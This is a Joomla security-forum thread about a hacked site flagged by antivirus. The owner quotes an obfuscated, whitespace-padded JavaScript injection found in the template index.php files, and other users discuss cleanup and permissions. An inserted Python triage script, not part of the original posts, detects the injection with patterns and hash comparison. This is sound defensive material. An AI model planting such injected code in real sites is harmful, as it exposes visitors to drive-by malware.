AVG says: Exploit Blackhole Exploit Kit (type 2704)

Discussion regarding Joomla! 3.x security issues.

RemoteC
Joomla! Apprentice
Posts: 14
Joined: Wed Feb 09, 2011 10:32 am

AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by RemoteC » Mon Jun 24, 2013 6:16 pm

Hello!

Today I got a call from a friend whose website I made a short time ago; she gets an error message from AVG saying that a threat was blocked.
AVG wrote:
File name: domain.tld/index.php
Threat name: Exploit Blackhole Exploit Kit (type 2704)
I visited the website with an empty sandbox and different browsers, but no such message appeared on any of my PCs (Win7 x64 / Win XP). Neither from AVG - which I installed to test - nor from any other virus or malware scanner (Avira, SUPERAntispyware, Malwarebytes).

The scan report from virustotal.com was also fine. The only suspicious thing is the scan from Wepawet, which shows a request to about:blank and to h$$$://w$$.people-search-global.c$$/clicker.php (censored to avoid accidental clicking). Link to report

So I had a further look and found a JS snippet in every template's index.php file:

<?
#0c0896#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          ps=\"split\";e=eval;v=\"0x\";a=0;z=\"y\";try{a*=25}catch(zz){a=1}if(!a){try{--e(\"doc\"+\"ument\")[\"\x62od\"+z]}catch(q){a2=\"_\";sa=0xa-02;}z=3_15_12_15_12__12_85_15_12_85_15_12\"[ps](a2);za=\"\";for(i=0;i<z.length;i++){za+=String[\"fromCharCode\"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}</script>";

#/0c0896#
?>
Very, very suspicious!
I've replaced all the index.php files with the original installation files. I'm only using a slightly changed (CSS, PHP) protostar template for the website, no 3rd party templates.

I have not found any suspicious files with jamss.php (scanned after I'd replaced the templates' index.php files).

I also had a look at the database but I couldn't find anything out of the ordinary there.

And here is what FPA says:
Problem Description :: Forum Post Assistant (v1.2.3) : 24th June 2013 wrote:Virus alert on website
Actions Taken To Resolve by Forum Post Assistant (v1.2.3) 24th June 2013 wrote:See description above.
Forum Post Assistant (v1.2.3) : 24th June 2013 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 3.1.1-Stable (Ember) 26-April-2013
Joomla! Platform :: Joomla Platform 12.2.0-Stable (Neil Armstrong) 21-September-2012
Joomla! Configured :: Yes | Writable (644) | Owner: zursonnenuhr (uid: 1/gid: 1) | Group: site520 (gid: 1) | Valid For: 3.1
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-348.3.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/.sites/315/site520/web | System TMP Writable: No

PHP Configuration :: Version: 5.3.21 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 30711 | Log Errors To: /var/log/httpd/php.log | Last Known Error: | Register Globals: 0 | Magic Quotes: | Safe Mode: | Open Base: /home/.sites/315/site520/web:/home/.sites/315/site520/tmp:/usr/share/pear | Uploads: 1 | Max. Upload Size: 40M | Max. POST Size: 50M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 55M

MySQL Configuration :: Version: 5.1.67 (Client:mysqlnd 5.0.8-dev - 20102224 - $Id: 65fe78e70ce53d27a6cd578597722950e490b0d0 $) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 1014.11 KiB | #of Tables: 67
Detailed Environment :: wrote:PHP Extensions :: Core (5.3.21) | date (5.3.21) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7-dev) | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | intl (1.1.0) | json (1.2.1) | mbstring () | mcrypt () | standard (5.3.21) | mysqlnd (mysqlnd 5.0.8-dev - 20102224 - $Id: 65fe78e70ce53d27a6cd578597722950e490b0d0 $) | mysqli (0.1) | mysql (1.0) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | Phar (2.0.1) | posix () | Reflection ($Id: 4af6c4c676864b1c0bfa693845af0688645c37cf $) | imap () | SimpleXML (0.1) | soap () | sockets () | SQLite (2.0-dev) | exif (1.4 $Id$) | suhosin (0.9.33) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | mhash () | Zend Engine (2.3.0) |
Potential Missing Extensions ::

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: error/ (775) |
Extensions Discovered :: wrote:Components :: SITE :: com_mailto (3.0.0) | com_wrapper (3.0.0) |
Components :: ADMIN :: com_easybookreloaded (3-1) | com_media (3.0.0) | com_checkin (3.0.0) | com_search (3.0.0) | com_installer (3.0.0) | com_content (3.0.0) | com_plugins (3.0.0) | com_redirect (3.0.0) | com_categories (3.0.0) | com_config (3.0.0) | com_tags (3.1.0) | com_weblinks (3.0.0) | com_login (3.0.0) | com_messages (3.0.0) | com_cache (3.0.0) | com_users (3.0.0) | com_admin (3.0.0) | com_cpanel (3.0.0) | com_finder (3.0.0) | com_menus (3.0.0) | com_banners (3.0.0) | com_templates (3.0.0) | com_newsfeeds (3.0.0) | com_modules (3.0.0) | com_joomlaupdate (3.0.0) | com_languages (3.0.0) |

Modules :: SITE :: mod_random_image (3.0.0) | mod_wrapper (3.0.0) | mod_articles_category (3.0.0) | mod_stats (3.0.0) | mod_articles_popular (3.0.0) | mod_related_items (3.0.0) | mod_login (3.0.0) | mod_languages (3.0.0) | mod_weblinks (3.0.0) | mod_tags_similar (3.1.0) | mod_tags_popular (3.1.0) | mod_articles_news (3.0.0) | mod_articles_archive (3.0.0) | mod_feed (3.0.0) | mod_articles_latest (3.0.0) | mod_users_latest (3.0.0) | mod_syndicate (3.0.0) | mod_breadcrumbs (3.0.0) | mod_finder (3.0.0) | mod_whosonline (3.0.0) | mod_menu (3.0.0) | mod_footer (3.0.0) | mod_search (3.0.0) | mod_custom (3.0.0) | mod_banners (3.0.0) | mod_articles_categories (3.0.0) |
Modules :: ADMIN :: mod_stats_admin (3.0.0) | mod_status (3.0.0) | mod_login (3.0.0) | mod_title (3.0.0) | mod_toolbar (3.0.0) | mod_quickicon (3.0.0) | mod_feed (3.0.0) | mod_submenu (3.0.0) | mod_popular (3.0.0) | mod_menu (3.0.0) | mod_logged (3.0.0) | mod_custom (3.0.0) | mod_multilangstatus (3.0.0) | mod_latest (3.0.0) | mod_version (3.0.0) |

Plugins :: SITE :: PLG_CONTENT_SIGE (3-1) | plg_content_pagebreak (3.0.0) | plg_content_finder (3.0.0) | plg_content_pagenavigation (3.0.0) | plg_content_vote (3.0.0) | plg_content_emailcloak (3.0.0) | plg_content_joomla (3.0.0) | plg_content_loadmodule (3.0.0) | plg_quickicon_joomlaupdate (3.0.0) | plg_quickicon_extensionupdate (3.0.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.5.6) | plg_system_sef (3.0.0) | plg_system_remember (3.0.0) | plg_system_languagecode (3.0.0) | plg_system_cache (3.0.0) | plg_system_p3p (3.0.0) | plg_system_logout (3.0.0) | plg_system_redirect (3.0.0) | plg_system_highlight (3.0.0) | plg_system_languagefilter (3.0.0) | plg_system_debug (3.0.0) | plg_system_log (3.0.0) | plg_finder_content (3.0.0) | plg_finder_contacts (3.0.0) | plg_finder_newsfeeds (3.0.0) | plg_finder_categories (3.0.0) | plg_finder_tags (3.0.0) | plg_finder_weblinks (3.0.0) | plg_extension_joomla (3.0.0) | plg_editors-xtd_pagebreak (3.0.0) | plg_editors-xtd_readmore (3.0.0) | plg_editors-xtd_image (3.0.0) | plg_editors-xtd_article (3.0.0) | plg_authentication_joomla (3.0.0) | plg_authentication_gmail (3.0.0) | plg_authentication_ldap (3.0.0) | plg_search_content (3.0.0) | plg_search_contacts (3.0.0) | plg_search_newsfeeds (3.0.0) | plg_search_categories (3.0.0) | plg_search_weblinks (3.0.0) | plg_captcha_recaptcha (3.0.0) | plg_user_contactcreator (3.0.0) | plg_user_profile (3.0.0) | plg_user_joomla (3.0.0) |
Templates Discovered :: wrote:Templates :: SITE :: beez3 (3.1.0) | protostar (1.0) | protostar (1.0) |
Templates :: ADMIN :: hathor (3.0.0) | isis (1.0) |
Of course I've changed all administrator passwords, the FTP password and the MySQL password.
Last edited by mandville on Mon Jun 24, 2013 7:32 pm, edited 1 time in total.
Reason: trimmed code, for readability
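
A defender-side triage script, added here as an example; it is not code from this thread, from RemoteC, or from the Joomla project. It walks a site tree looking for the shape of the injected block quoted above (a `#xxxxxx#` ... `#/xxxxxx#` marker pair, a long run of spaces used to push the payload off-screen in an editor, and an echoed <script> that decodes itself with eval/fromCharCode) and compares every PHP file's SHA-256 against a pristine extraction of the same Joomla release, which is the automated form of what RemoteC did by hand when replacing the template index.php files with the originals. The indicator names, the regular expressions, the helper names (`classify`, `scan`, `baseline_hashes`, `demo`) and the two sample index.php files built in a temporary directory are all constructed for this example; only the marker string 0c0896 comes from the quoted snippet, and the encoded payload is replaced by a harmless placeholder.

```python
"""Post-compromise triage for a Joomla-style PHP tree (constructed example)."""
import hashlib
import os
import re
import tempfile

# Indicators derived from the injected block quoted in the thread:
#  - a `#xxxxxx#` ... `#/xxxxxx#` comment pair wrapping the payload,
#  - very long runs of spaces that push the payload off-screen in an editor,
#  - an echoed <script> that decodes itself with eval / String.fromCharCode.
MARKER_RE = re.compile(r"#([0-9a-f]{6})#.*?#/\1#", re.S)
PADDING_RE = re.compile(r" {80,}")
SCRIPT_ECHO_RE = re.compile(r'echo\s+"[^"]*<script', re.I)
DECODER_RE = re.compile(r"fromCharCode|\beval\b")


def classify(text):
    """Return the list of indicator names present in one PHP file's contents."""
    hits = []
    if MARKER_RE.search(text):
        hits.append("marker-pair")
    if PADDING_RE.search(text):
        hits.append("whitespace-padding")
    if SCRIPT_ECHO_RE.search(text) and DECODER_RE.search(text):
        hits.append("echoed-script-decoder")
    return hits


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def baseline_hashes(clean_root):
    """Map relative path -> SHA-256 for a pristine Joomla extraction of the same version."""
    hashes = {}
    for dirpath, _, files in os.walk(clean_root):
        for name in files:
            full = os.path.join(dirpath, name)
            hashes[os.path.relpath(full, clean_root)] = sha256_of(full)
    return hashes


def scan(site_root, baseline=None):
    """Walk site_root; return {relative path: [indicators]} for every PHP file worth a look."""
    findings = {}
    for dirpath, _, files in os.walk(site_root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, site_root)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = classify(fh.read())
            # A hash mismatch is a review item, not proof: a legitimately edited
            # template (such as a tweaked protostar) shows up here too.
            if baseline and rel in baseline and baseline[rel] != sha256_of(full):
                hits.append("differs-from-baseline")
            if hits:
                findings[rel] = hits
    return findings


# Constructed stand-in for a clean template index.php (not the real protostar file).
CLEAN_INDEX = (
    "<?php\ndefined('_JEXEC') or die;\n?>\n"
    '<!DOCTYPE html>\n<html><body><jdoc:include type="component" /></body></html>\n'
)

# Constructed stand-in for the injected file: same shape as the quoted snippet
# (marker pair, space padding, echoed <script> with an eval/fromCharCode decoder),
# but the encoded payload is replaced by a harmless placeholder.
INFECTED_INDEX = (
    "<?\n#0c0896#\n" + " " * 200 + 'echo "' + " " * 200
    + '<script type=\\"text/javascript\\">e=eval;z=\\"PLACEHOLDER\\";'
    + 'za=String[\\"fromCharCode\\"](0x41);</script>";\n\n#/0c0896#\n?>\n'
    + CLEAN_INDEX
)


def demo():
    """Build a clean tree and a site tree with one injected template, then scan the site."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, site = os.path.join(tmp, "clean"), os.path.join(tmp, "site")
        for root in (clean, site):
            for tpl in ("protostar", "beez3"):
                os.makedirs(os.path.join(root, "templates", tpl))
                with open(os.path.join(root, "templates", tpl, "index.php"), "w") as fh:
                    fh.write(CLEAN_INDEX)
        with open(os.path.join(site, "templates", "protostar", "index.php"), "w") as fh:
            fh.write(INFECTED_INDEX)
        return scan(site, baseline_hashes(clean))


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it from a machine you trust against a copy of the site, with the baseline taken from a freshly downloaded Joomla package of the same release. The pattern checks only catch this particular injection style, so the hash comparison is the part that generalises: anything that differs from the pristine tree, plus anything that is not in the pristine tree at all (extensions, uploads, the error/ folder), needs a human look.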

mattsimonsen
Joomla! Apprentice
Posts: 17
Joined: Thu Jun 13, 2013 2:29 am
Location: Jackson, CA, USA

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by mattsimonsen » Mon Jun 24, 2013 8:49 pm

Once you see a single exploit, there are many areas that may get infected. We have seen sites where multiple hacks occur, even htaccess files that are specifically created to keep out other hackers!

The database, PHP files, even CSS and/or template theme files often get changed. Of course, if the warning is cached, it could be that you have fixed it and the anti-virus folks have not updated their system to reflect the cleaned-up site.

One good starting guide is here: http://www.google.com/webmasters/hacked/ The process isn't simple, and once in a site, hackers are vigilant about staying hidden.
Matt Simonsen
SRI Hosting, Inc. http://srihosting.com
Founded in 2005, an IT Services company with proven success building and running Joomla sites.

RemoteC
Joomla! Apprentice
Posts: 14
Joined: Wed Feb 09, 2011 10:32 am

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by RemoteC » Tue Jun 25, 2013 9:25 am

But where is the exploit? How can I fix it? Was it really done by key-logging the administrator and/or FTP password? The problem for me is: I know how to keep a system clean (at least I think so), but a lot of users who may have privileges on a Joomla! site do not care about security. Mobile devices are an additional risk, as I've read this exploit kit can also handle Android. So maybe it is not the PC that is infected but a tablet or smartphone from which the administrator panel was accessed.

Or is there something hidden in either the core or in one of the two plugins I've installed: Easybook Reloaded and Simple Image Gallery Extended? I'm using both extensions on multiple sites - the infected one is my first J! 3 site.

I have not found any other changed files like .htaccess or the folders' index.html files. It is of course quite effective to change every template's index.php file because this file is rendered in the browser. Is it maybe also easier to change template files?

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by mandville » Tue Jun 25, 2013 11:36 am

Why do you have an error folder with 775 permissions?
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

RemoteC
Joomla! Apprentice
Posts: 14
Joined: Wed Feb 09, 2011 10:32 am

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by RemoteC » Tue Jun 25, 2013 8:21 pm

mandville wrote:Why do you have an error folder with 775 permissions?
I don't know. This is a default folder from my webhoster, including the default 404, 500, ... HTML error pages with the logo and slogan of my webhoster.
Anyway, I've changed it to 755. There is no malicious code in the error HTML files.

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by mandville » Tue Jun 25, 2013 8:36 pm

I suggest you check with your host what their mask, skel and jailshell situation is like.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
